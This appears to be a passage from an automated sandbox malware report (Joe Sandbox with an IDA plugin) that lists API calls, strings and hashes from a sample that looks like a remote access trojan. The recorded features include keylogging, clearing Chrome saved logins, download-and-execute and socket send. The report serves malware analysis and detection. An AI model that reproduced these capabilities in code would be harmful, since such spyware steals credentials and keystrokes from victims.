                        • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                        • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
                        • Opcode Fuzzy Hash: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                        • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
                        APIs
                          • Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                          • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
                          • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
                        • Sleep.KERNEL32(00000BB8), ref: 0040E243
                        • ExitProcess.KERNEL32 ref: 0040E2B4
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseExitOpenProcessQuerySleepValue
                        • String ID: 3.8.0 Pro$override$pth_unenc$!G
                        • API String ID: 2281282204-1386060931
                        • Opcode ID: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                        • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                        • Opcode Fuzzy Hash: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                        • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                        APIs
                        • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                        • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                        • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                        • InternetCloseHandle.WININET(00000000), ref: 00419407
                        • InternetCloseHandle.WININET(00000000), ref: 0041940A
                        Strings
                        • http://geoplugin.net/json.gp, xrefs: 004193A2
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Internet$CloseHandleOpen$FileRead
                        • String ID: http://geoplugin.net/json.gp
                        • API String ID: 3121278467-91888290
                        • Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                        • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                        • Opcode Fuzzy Hash: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                        • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                        APIs
                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                        • GetLastError.KERNEL32 ref: 0040A999
                        Strings
                        • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                        • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                        • UserProfile, xrefs: 0040A95F
                        • [Chrome StoredLogins not found], xrefs: 0040A9B3
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DeleteErrorFileLast
                        • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        • API String ID: 2018770650-1062637481
                        • Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                        • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                        • Opcode Fuzzy Hash: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                        • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                        APIs
                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                        • OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                        • GetLastError.KERNEL32 ref: 00415CDB
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                        • String ID: SeShutdownPrivilege
                        • API String ID: 3534403312-3733053543
                        • Opcode ID: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                        • Instruction ID: ffc0972e6e84a8b4c82c7ff824774f91a9d221977230a9de1ecf93d0fe8dbf87
                        • Opcode Fuzzy Hash: 6b6a245ea7d04d36a7da703741a32f9ec851e6ff0cbdb80aef66d6ce6c3f9121
                        • Instruction Fuzzy Hash: 0AF03A71901229ABDB10ABA1ED4DEEF7F7CEF05616F510060B805A2152D6749A04CAB5
                        APIs
                        • __EH_prolog.LIBCMT ref: 00408393
                          • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                          • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                        • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                        • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                          • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                          • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                          • Part of subcall function 00404E06: CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                        • FindClose.KERNEL32(00000000), ref: 004086F4
                          • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                          • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                        • String ID:
                        • API String ID: 1824512719-0
                        • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                        • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                        • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                        • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                        APIs
                        • GetForegroundWindow.USER32 ref: 0040949C
                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                        • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                        • GetKeyState.USER32(00000010), ref: 004094B8
                        • GetKeyboardState.USER32(?), ref: 004094C5
                        • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                        • String ID:
                        • API String ID: 3566172867-0
                        • Opcode ID: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                        • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                        • Opcode Fuzzy Hash: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                        • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                        APIs
                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                        • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                        • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                        • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                        • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                        • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Service$CloseHandle$Open$ManagerStart
                        • String ID:
                        • API String ID: 276877138-0
                        • Opcode ID: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                        • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                        • Opcode Fuzzy Hash: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                        • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                        APIs
                        • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                        • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                          • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Find$CreateFirstNext
                        • String ID: H"G$`'G$`'G
                        • API String ID: 341183262-2774397156
                        • Opcode ID: 753b25ef91f62c10a23852cd7e303c3a05920bb6bbf3c128c8b3a0c8982e454a
                        • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                        • Opcode Fuzzy Hash: 753b25ef91f62c10a23852cd7e303c3a05920bb6bbf3c128c8b3a0c8982e454a
                        • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                        APIs
                          • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                          • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                          • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                          • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                          • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                        • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                        • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                        • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                        • String ID: PowrProf.dll$SetSuspendState
                        • API String ID: 1589313981-1420736420
                        • Opcode ID: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
                        • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
                        • Opcode Fuzzy Hash: a90733ccfc111f0b9843f199546f20f3a5fde930ee9984aa821316ce92a955c1
                        • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
                        APIs
                        • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                        • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                        • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoLocale
                        • String ID: ACP$OCP
                        • API String ID: 2299586839-711371036
                        • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                        • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                        • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                        • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                        APIs
                        • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                        • wsprintfW.USER32 ref: 0040A13F
                          • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: EventLocalTimewsprintf
                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                        • API String ID: 1497725170-248792730
                        • Opcode ID: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                        • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                        • Opcode Fuzzy Hash: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                        • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                        APIs
                        • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                        • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                        • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                        • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Resource$FindLoadLockSizeof
                        • String ID: SETTINGS
                        • API String ID: 3473537107-594951305
                        • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                        • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                        • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                        • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                        APIs
                        • __EH_prolog.LIBCMT ref: 004087A5
                        • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                        • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                        • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstH_prologNext
                        • String ID:
                        • API String ID: 1157919129-0
                        • Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                        • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                        • Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                        • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                        • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                        • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                        • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                        • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                        • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                        • String ID:
                        • API String ID: 745075371-0
                        • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                        • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                        • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                        • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                        APIs
                        • __EH_prolog.LIBCMT ref: 0040784D
                        • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                        • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                        • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                        • String ID:
                        • API String ID: 1771804793-0
                        • Opcode ID: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                        • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                        • Opcode Fuzzy Hash: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                        • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                        APIs
                          • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                        • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                          • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                          • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                        • String ID:
                        • API String ID: 1735047541-0
                        • Opcode ID: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                        • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                        • Opcode Fuzzy Hash: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                        • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: A%E$A%E
                        • API String ID: 0-137320553
                        • Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                        • Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
                        • Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                        • Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84
                        APIs
                        • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                          • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
                          • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
                          • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCreateInfoParametersSystemValue
                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                        • API String ID: 4127273184-3576401099
                        • Opcode ID: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                        • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                        • Opcode Fuzzy Hash: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                        • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                        • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00441F85,?,?,?,?,004419DC,?,00000004), ref: 0044EF9A
                        • _wcschr.LIBVCRUNTIME ref: 0044F02A
                        • _wcschr.LIBVCRUNTIME ref: 0044F038
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00441F85,00000000,004420A5), ref: 0044F0DB
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                        • String ID:
                        • API String ID: 4212172061-0
                        • Opcode ID: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                        • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
                        • Opcode Fuzzy Hash: 2958d0d59106b2716bbf9024854ff4f325b6253e079e5f73fc6a0a954244a96d
                        • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.1669304564.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_400000_ZRuVeAoBoxootS.jbxd
                        Yara matches
                        Similarity
                        • API ID: DownloadExecuteFileShell
                        • String ID: open
                        • API String ID: 2825088817-2758837156
                        • Opcode ID: 400a122d183a9112cc7a0cd06a1688c26b37542af8c87b61aae9a43f761ae058
                        • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                        • Opcode Fuzzy Hash: 400a122d183a9112cc7a0cd06a1688c26b37542af8c87b61aae9a43f761ae058
                        • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                        APIs
                          • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                          • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                          • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                          • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                          • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                        Memory Dump Source
